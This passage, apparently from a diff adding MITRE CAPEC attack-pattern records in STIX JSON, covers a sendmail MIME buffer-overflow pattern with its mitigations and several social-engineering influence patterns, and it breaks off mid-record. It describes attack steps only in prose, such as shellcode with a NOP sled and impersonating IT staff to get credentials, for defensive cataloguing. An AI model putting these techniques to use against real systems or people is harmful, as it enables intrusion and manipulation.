performing these conversions. This gave attacker an opportunity to overwrite the internal stack of sendmail while it is executing with root privileges. An attacker first probes the target system to figure out what mail server is used on the system and what version. An attacker could then test out the exploit at their leisure on their own machine running the same version of the mail server before using it in the wild.See also: CVE-1999-0047" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target mail server: The adversary identifies a target mail server that they wish to attack.

    2. Techniques
    Use Nmap on a system to identify a mail server service.

  2. Determine viability of attack: Determine whether the mail server is unpatched and is potentially vulnerable to one of the known MIME conversion buffer overflows (e.g. Sendmail 8.8.3 and 8.8.4).

Experiment

  1. Find injection vector: Identify places in the system where vulnerable MIME conversion routines may be used.

  2. Craft overflow content: The adversary crafts e-mail messages with special headers that will cause a buffer overflow for the vulnerable MIME conversion routine. The intent of this attack is to leverage the overflow for execution of arbitrary code and gain access to the mail server machine, so the adversary will craft an email that not only overflows the targeted buffer but does so in such a way that the overwritten return address is replaced with one of the adversary's choosing.

    3. Techniques
    Create malicious shellcode that will execute when the program execution is returned to it.
    Use a NOP-sled in the overflow content to more easily \"slide\" into the malicious code. This is done so that the exact return address need not be correct, only in the range of all of the NOPs

Exploit

  1. Overflow the buffer: Send e-mail messages to the target system with specially crafted headers that trigger the buffer overflow and execute the shell code.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The target system uses a mail server.", + "Mail server vendor has not released a patch for the MIME conversion routine, the patch itself has a security hole or does not fix the original problem, or the patch has not been applied to the user's system." + ], + "x_capec_skills_required": { + "High": "Causing arbitrary code to execute on the target system.", + "Low": "It may be trivial to cause a DoS via this attack pattern" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Stay up to date with third party vendor patches", + "id": "course-of-action--6db12259-6932-4e8f-9abb-ef1ac7a34727", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-42-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3b0ebb42-718a-4b46-8ffb-8ce77603ff60", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6db12259-6932-4e8f-9abb-ef1ac7a34727", + "spec_version": "2.1", + "target_ref": "attack-pattern--3c08bb9d-43b5-4468-8b38-387c6cb60da7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n Disable the 7 to 8 bit conversion. This can be done by removing the F=9 flag from all Mailer specifications in the sendmail.cf file.\n For example, a sendmail.cf file with these changes applied should look similar to (depending on your system and configuration):\n Mlocal, P=/usr/libexec/mail.local, F=lsDFMAw5:/|@qrmn, S=10/30, R=20/40,T=DNS/RFC822/X-Unix,A=mail -d $u\n Mprog, P=/bin/sh, F=lsDFMoqeu, S=10/30, R=20/40,D=$z:/,T=X-Unix,A=sh -c $u\n \n This can be achieved for the \"Mlocal\" and \"Mprog\" Mailers by modifying the \".mc\" file to include the following lines:\n define(`LOCAL_MAILER_FLAGS',ifdef(`LOCAL_MAILER_FLAGS',`translit(LOCAL_MAILER_FLAGS, `9')',`rmn'))\n \n define(`LOCAL_SHELL_FLAGS',ifdef(`LOCAL_SHELL_FLAGS',`translit(LOCAL_SHELL_FLAGS, `9')',`eu'))\n \n \n and then rebuilding the sendmail.cf file using m4(1).\n From \"Exploiting Software\", please see reference below.\n ", + "id": "course-of-action--42a390b0-9943-4e0f-91ff-7e67aecd06f1", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-42-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f35d5325-e354-49ab-a92f-5ba6b8045162", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--42a390b0-9943-4e0f-91ff-7e67aecd06f1", + "spec_version": "2.1", + "target_ref": "attack-pattern--3c08bb9d-43b5-4468-8b38-387c6cb60da7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use the sendmail restricted shell program (smrsh)", + "id": "course-of-action--6de86e67-2849-4490-9556-799ba134737f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-42-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--011efc3d-4f04-4a7a-9a14-95f8855cbd0b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6de86e67-2849-4490-9556-799ba134737f", + "spec_version": "2.1", + "target_ref": "attack-pattern--3c08bb9d-43b5-4468-8b38-387c6cb60da7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use mail.local", + "id": "course-of-action--22ba1687-e539-480a-897e-2480bbfcdcdb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-42-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--273ca915-2a10-4a89-8347-e45deeb8176d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--22ba1687-e539-480a-897e-2480bbfcdcdb", + "spec_version": "2.1", + "target_ref": "attack-pattern--3c08bb9d-43b5-4468-8b38-387c6cb60da7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary leverages a perception of scarcity to persuade the target to perform an action or divulge information that is advantageous to the adversary. By conveying a perception of scarcity, or a situation of limited supply, the adversary aims to create a sense of urgency in the context of a target's decision-making process.", + "external_references": [ + { + "external_id": "CAPEC-420", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/420.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--490d66db-ab96-48b4-ad40-8625319530eb", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Influence Perception of Scarcity", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--af1a9e65-4ca7-4551-b1de-6192539652c5" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Attacks that leverage the principle of scarcity can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Confidentiality": [ + "Other (Attacks that leverage the principle of scarcity can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Integrity": [ + "Other (Attacks that leverage the principle of scarcity can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_example_instances": [ + "An adversary sends an email to a target about a limited-time opportunity to claim a considerable monetary reward. The email contains a link to a site which the adversary says is only active for a short time and to the first person to claim it. By convincing the user of the scarcity of the monetary reward, the adversary aims to persuade them to click on the malicious link in the email." + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The adversary must have the means and knowledge of how to communicate with the target in some manner." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "The adversary requires strong inter-personal and communication skills." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6ee824b4-e2c0-4406-b7d9-9455b31c810c", + "modified": "2017-08-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9ce44430-81de-4c5a-8458-402f622af40a", + "spec_version": "2.1", + "target_ref": "attack-pattern--490d66db-ab96-48b4-ad40-8625319530eb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary uses a social engineering technique to convey a sense of authority that motivates the target to reveal specific information or take specific action. There are various techniques for producing a sense of authority during ordinary modes of communication. One common method is impersonation. By impersonating someone with a position of power within an organization, an adversary may motivate the target individual to reveal some piece of sensitive information or perform an action that benefits the adversary.", + "external_references": [ + { + "external_id": "CAPEC-421", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/421.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--effcb600-1cb5-4601-baa6-cb8fc02d586c", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Influence Perception of Authority", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--af1a9e65-4ca7-4551-b1de-6192539652c5" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Attacks that leverage the principle of scarcity can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Confidentiality": [ + "Other (Attacks that leverage the principle of scarcity can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Integrity": [ + "Other (Attacks that leverage the principle of scarcity can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_example_instances": [ + "The adversary calls the target and announces that they are the head of IT at the target's company. The adversary goes on to say that there has been a technical issue and they need the target's login credentials for their account. By convincing the target of their authority, the adversary hopes the target will reveal the sensitive information." + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The adversary must have the means and knowledge of how to communicate with the target in some manner." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "The adversary requires strong inter-personal and communication skills." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--73e7aab7-ed20-4616-ae8f-4708e16de84c", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9ce44430-81de-4c5a-8458-402f622af40a", + "spec_version": "2.1", + "target_ref": "attack-pattern--effcb600-1cb5-4601-baa6-cb8fc02d586c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary uses social engineering to convince the target to do minor tasks as opposed to larger actions. After complying with a request, individuals are more likely to agree to subsequent requests that are similar in type and required effort.", + "external_references": [ + { + "external_id": "CAPEC-422", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/422.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--ef383edc-9f3a-405f-9406-3bd186551d35", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Influence Perception of Commitment and Consistency", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--af1a9e65-4ca7-4551-b1de-6192539652c5" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Attacks that leverage the principle of scarcity can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Confidentiality": [ + "Other (Attacks that leverage the principle of scarcity can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Integrity": [ + "Other (Attacks that leverage the principle of scarcity can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The adversary must have the means and knowledge of how to communicate with the target in some manner." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "The adversary requires strong inter-personal and communication skills." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d680be2b-c855-49c2-9b1f-929dd51b97e4", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9ce44430-81de-4c5a-8458-402f622af40a", + "spec_version": "2.1", + "target_ref": "attack-pattern--ef383edc-9f3a-405f-9406-3bd186551d35", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Individuals should avoid complying with suspicious requests.", + "id": "course-of-action--4bc29bf9-910a-4f4a-8423-87090f815507", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-422-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--36560036-998b-4d8b-8e16-e766cd8d1876", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4bc29bf9-910a-4f4a-8423-87090f815507", + "spec_version": "2.1", + "target_ref": "attack-pattern--ef383edc-9f3a-405f-9406-3bd186551d35", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary influences the target's actions by building a relationship where the target has a liking to the adversary. People are more likely to be influenced by people of whom they are fond, so the adversary attempts to ingratiate themself with the target via actions, appearance, or a combination thereof.", + "external_references": [ + { + "external_id": "CAPEC-423", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/423.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--57a56016-e387-456e-badf-a60523e58277", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Influence Perception of Liking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--af1a9e65-4ca7-4551-b1de-6192539652c5" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Attacks that leverage the principle of liking can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Confidentiality": [ + "Other (Attacks that leverage the principle of liking can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Integrity": [ + "Other (Attacks that leverage the principle of liking can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The adversary must have the means and knowledge of how to communicate with the target in some manner.The adversary must have knowledge of the types of things that the target likes." + ], + "x_capec_skills_required": { + "Low": "The adversary requires strong inter-personal and communication skills." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e3cc5859-4cd7-4218-ad1f-c7047264db33", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9ce44430-81de-4c5a-8458-402f622af40a", + "spec_version": "2.1", + "target_ref": "attack-pattern--57a56016-e387-456e-badf-a60523e58277", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary influences the target's actions by leveraging the inherent human nature to assume behavior of others is appropriate. In situations of uncertainty, people tend to behave in ways they see others behaving. The adversary convinces the target of adopting behavior or actions that is advantageous to the adversary.", + "external_references": [ + { + "external_id": "CAPEC-424", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/424.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--d8a0c0f1-dc07-49d4-9d4a-e96e526a4c69", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Influence Perception of Consensus or Social Proof", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--af1a9e65-4ca7-4551-b1de-6192539652c5" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Attacks that leverage the principle of liking can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Confidentiality": [ + "Other (Attacks that leverage the principle of liking can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Integrity": [ + "Other (Attacks that leverage the principle of liking can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary must have the means and knowledge of how to communicate with the target in some manner." + ], + "x_capec_skills_required": { + "Low": "The adversary requires strong inter-personal and communication skills." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e6e89355-28b2-4f0e-be9d-bdaab0213673", + "modified": "2017-08-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9ce44430-81de-4c5a-8458-402f622af40a", + "spec_version": "2.1", + "target_ref": "attack-pattern--d8a0c0f1-dc07-49d4-9d4a-e96e526a4c69", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary uses framing techniques to contextualize a conversation so that the target is more likely to be influenced by the adversary's point of view. Framing is information and experiences in life that alter the way we react to decisions we must make. This type of persuasive technique exploits the way people are conditioned to perceive data and its significance, while avoiding negative or avoidance responses from the target. Rather than a specific technique framing is a methodology of conversation that slowly encourages the target to adopt to the adversary's perspective. One technique of framing is to avoid the use of the word \"No\" and to contextualize responses in a manner that is positive. When performed skillfully the target is much more likely to volunteer information or perform actions favorable to the adversary.", + "external_references": [ + { + "external_id": "CAPEC-425", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/425.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--89d61215-2dcb-4684-983b-89a6e519b035", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Target Influence via Framing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--eedaef1c-c3fb-4135-a1b5-4b186b9da854" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Other (Successful attacks that influence the target via framing into performing an action or sharing sensitive information can result in a variety of consequences that negatively affect the confidentiality of an application or system.)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary must have the means and knowledge of how to communicate with the target in some manner." + ], + "x_capec_skills_required": { + "Low": "The adversary requires strong inter-personal and communication skills." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c5843921-552b-4480-815d-43dc331c44bd", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9ce44430-81de-4c5a-8458-402f622af40a", + "spec_version": "2.1", + "target_ref": "attack-pattern--89d61215-2dcb-4684-983b-89a6e519b035", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Avoid sharing unnecessary information during interactions beyond what is absolutely required for effective communication.", + "id": "course-of-action--f0dff928-51e9-432a-adb9-1dd4d3008256", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-425-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5f246e08-06d0-46f0-a49f-061d90062966", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f0dff928-51e9-432a-adb9-1dd4d3008256", + "spec_version": "2.1", + "target_ref": "attack-pattern--89d61215-2dcb-4684-983b-89a6e519b035", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary incites a behavior from the target by manipulating something of influence. This is commonly associated with financial, social, or ideological incentivization. Examples include monetary fraud, peer pressure, and preying on the target's morals or ethics. The most effective incentive against one target might not be as effective against another, therefore the adversary must gather information about the target's vulnerability to particular incentives.", + "external_references": [ + { + "external_id": "CAPEC-426", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/426.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--346d34f3-13e5-4d95-8e96-4b381e76e132", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Influence via Incentives", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--eedaef1c-c3fb-4135-a1b5-4b186b9da854" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Attacks that successfully incentivize the target into performing an action beneficial to the adversary can result in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Confidentiality": [ + "Other (Attacks that successfully incentivize the target into performing an action beneficial to the adversary can result in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Integrity": [ + "Other (Attacks that successfully incentivize the target into performing an action beneficial to the adversary can result in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary must have the means and knowledge of how to communicate with the target in some manner.The adversary must have knowledge of the incentives that would influence the actions of the specific target." + ], + "x_capec_skills_required": { + "Low": "The adversary requires strong inter-personal and communication skills." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f6433a46-1658-4501-a2d5-69157cd29ad6", + "modified": "2017-08-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9ce44430-81de-4c5a-8458-402f622af40a", + "spec_version": "2.1", + "target_ref": "attack-pattern--346d34f3-13e5-4d95-8e96-4b381e76e132", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary shapes the target's actions or behavior by focusing on the ways human interact and learn, leveraging such elements as cognitive and social psychology. In a variety of ways, a target can be influenced to behave or perform an action through capitalizing on what scholarship and research has learned about how and why humans react to specific scenarios and cues.", + "external_references": [ + { + "external_id": "CAPEC-427", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/427.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--9e487767-c1e6-45f9-ae01-1fb1e2d6f030", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Influence via Psychological Principles", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--eedaef1c-c3fb-4135-a1b5-4b186b9da854" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Attacks that successfully influence the target into performing an action via psychological principles can result in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Confidentiality": [ + "Other (Attacks that successfully influence the target into performing an action via psychological principles can result in a variety of consequences that negatively 